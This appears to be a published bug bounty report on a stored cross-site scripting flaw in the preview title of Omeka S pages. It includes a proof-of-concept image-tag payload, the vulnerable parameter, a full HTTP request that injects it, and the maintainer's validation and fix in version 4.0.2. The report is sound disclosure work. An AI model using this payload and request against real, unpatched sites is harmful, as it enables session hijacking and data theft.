Stored XSS in Preview title in omeka/omeka-s

Valid

Reported on

Jul 24th 2023


Description

There is accumulated XSS in the preview title of the page.

Proof of Concept

Step 1. Log in to the administrator screen and create a new page.
Step 2. Insert "Browse preview" from "Add new block" and specify Payload in "Preview title". Step 3. When you access the preview screen in the saved state, the embedded script (alert) will be executed.

Payload

<img src=x onerror=alert(document.domain)>

Parameter

o:block[0][o:data][heading]

Request

POST /admin/site/s/test/page/test HTTP/1.1
 ...

o%3Ais_public=1&sitepageform_csrf=f49b093285a9d1c137c456c725a74649-f2ddcd5a1ccc9cb264a38318182dd604&o%3Atitle=test&o%3Aslug=test&o%3Ablock%5B0%5D%5Bo%3Alayout%5D=browsePreview&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bresource_type%5D=items&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bquery%5D=&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blimit%5D=12&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-heading&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=resource-body&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bcomponents%5D%5B%5D=thumbnail&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Bheading%5D=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&o%3Ablock%5B0%5D%5Bo%3Adata%5D%5Blink-text%5D=Browse+all

PoC Video

https://drive.google.com/file/d/1PIReOl9qiJBUqw9522ctxrHGBvn8JUOI/view?usp=sharing

Impact

Stored XSS vulnerabilities can lead to data theft, account compromise, and the distribution of malware.
Attackers can inject malicious scripts into a website, allowing them to steal sensitive information or hijack user sessions.
Additionally, stored XSS can result in website defacement and content manipulation, causing reputational damage.
It can also be used as a platform for launching phishing attacks, tricking users into revealing their credentials or sensitive data.

Occurrences

Properly sanitize inserted strings.

We are processing your report and will contact the omeka/omeka-s team within 24 hours. 7 months ago
morioka12 modified the report
7 months ago
morioka12 modified the report
7 months ago
We have contacted a member of the omeka/omeka-s team and are waiting to hear back 7 months ago
John Flatness
7 months ago

So, there's a setting for sanitizing user input in HTML contexts like this: Settings -> Security -> Use HTMLPurifier. I assume you have that setting disabled?

morioka12 modified the report
7 months ago
morioka12
7 months ago

Researcher


Sorry, I made a mistake in reporting the vulnerability. I have revised the report again, so please check it.

John Flatness validated this vulnerability 7 months ago
scgajge12 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
John Flatness marked this as fixed in 4.0.2 with commit c6833c 7 months ago
The fix bounty has been dropped
This vulnerability has now been published 7 months ago
browse-preview.phtml#L9 has been validated
to join this conversation